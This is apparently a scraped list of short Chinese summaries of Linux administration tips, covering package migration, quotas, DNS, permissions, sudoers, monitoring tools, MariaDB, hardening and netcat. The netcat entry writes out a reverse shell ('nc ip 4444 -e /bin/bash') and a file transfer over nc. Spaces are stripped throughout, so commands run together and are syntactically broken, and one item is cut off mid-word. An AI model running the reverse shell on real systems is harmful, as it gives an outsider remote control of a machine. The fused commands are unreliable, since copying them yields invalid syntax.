-
dnfdistro-sync--allowerasing是唯一能完成CentOS7→RockyLinux9直接跨大版本迁移的命令,因其可强制替换不兼容包并解决依赖冲突;但必须严格按顺序执行清源、换钥、配仓三步,否则因yum/dnf、Python、rpm工具链断层导致签名失败或元数据混乱,而yumswap或升级脚本因底层不兼容无法直接使用。
-
磁盘配额配置需先安装quota工具包,修改/etc/fstab启用配额支持,重启或重新挂载文件系统,生成配额文件并启用配额,使用edquota设置用户或组的具体限制,最后通过quota和repquota命令监控使用情况。常见陷阱包括未重新挂载分区、忽略inode限制、误解宽限期及文件系统支持差异;最佳实践包括先观察再设置、合理搭配软硬限制、与用户沟通、定期审查配额、自动化监控报警及优先考虑XFS文件系统。
-
Linux系统DNS配置有五种方法:一、修改/etc/resolv.conf;二、通过NetworkManager配置;三、配置systemd-resolved服务;四、临时设置DNS;五、注意发行版差异、端口冲突、容器及防火墙限制。
-
递归修改Linux文件权限和所有权需使用chmod-R和chown-R命令。1.chmod-R用于批量设置目录及其内容的权限,如chmod-R755/var/www/html将所有者权限设为读写执行、组和其他用户为只读执行;2.chown-R用于更改目录及内部文件的所有者和组,如chown-Rwww-data:www-data/var/www/html确保Web服务正常访问;3.使用find命令可实现更精细控制,如find/var/www/html-typed-execchmod755{}+仅对目录设75
-
sudoers中必须使用完整绝对路径且不带参数授权脚本,脚本需root所有、0755权限,配置文件权限≤0600,开头校验SHA256哈希并显式指定外部命令绝对路径,优先使用/etc/sudoers.d/目录管理配置,并启用日志审计。
-
gitblame默认不准,因只显示已提交历史、遇merge停止追踪、重命名不识别;需用--ancestry-path、-C-M、-S、--ignore-rev等参数及交叉验证确保作者可信。
-
ulimit-u限制用户级进程/线程总数,需同步调大/proc/sys/kernel/pid_max系统级PID上限,否则高并发时因PID耗尽报“Resourcetemporarilyunavailable”;systemd服务和容器环境须单独配置,不自动继承limits.conf。
-
在Linux中查看PCI设备信息需使用lspci等工具:一、lspci列基础信息;二、sudolspci-v查驱动与资源;三、lspci|grep筛选并-lspci-nn提取ID;四、lspci-t看拓扑;五、依发行版安装pciutils;六、sysfs验证驱动绑定;七、modinfo检查驱动兼容性。
-
可通过iftop、nethogs、bmon、vnstat或watch+cat/proc/net/dev五种命令行工具实时监控Linux网络流量:iftop按连接显示带宽,nethogs按进程统计,bmon提供多网卡图表,vnstat后台低开销采集,watch+cat实现零依赖速查。
-
DroneCI部署失败主因是依赖缺失、RPC密钥不一致或GiteeOAuth配置错误;需依次验证Docker/DockerCompose、生成并同步DRONE_RPC_SECRET、正确配置GiteeOAuth应用、分离部署Server与Runner、校验.drone.yml语法及Gitee权限。
-
Linux部署MariaDB有四种经验证方法:一、系统包管理器安装,适配RHEL/CentOS/Debian/Ubuntu,自动处理依赖;二、官方YUM/APT仓库安装指定版本,保障更新及时性;三、二进制包手动部署,适用于离线或定制化场景;四、Docker容器运行,支持环境隔离与快速启停。
-
Linux安全基线不是“一键加固脚本”,而是围绕账户、认证、服务、日志四个维度的持续校准过程;配置错误比不配更危险,尤其在pam_cracklib.so参数和sshd_config逻辑顺序上容易引发登录锁死。
-
mount的作用是将独立的文件系统挂载到Linux根目录树的指定挂载点,使其可访问。它通过VFS层实现不同文件系统的统一管理,使用mount命令可手动挂载设备,配置/etc/fstab可实现开机自动挂载,确保数据安全与系统稳定。
-
掌握netcat需熟悉其五大功能:1、用“nc-vhostport”建立TCP/UDP连接并通信;2、通过“nc-l-pport”监听本地端口接收数据;3、结合重定向实现文件传输,如“nc-l-p9999>file”接收,“catfile|ncip9999”发送;4、使用“nc-z-vipport-range”扫描开放端口,支持TCP/UDP;5、执行“nc-l-p4444”监听并用“ncip4444-e/bin/bash”反弹shell,实现远程控制。
-
Linux查看TCP重传率需计算「重传段数/总发包数」比值,推荐用/proc/net/snmp两次采样取差值,或sar-nTCP,ETCP看retrans/s瞬时速率,ss-ti定位具体连接,tcpdump+tshark验证真实性。
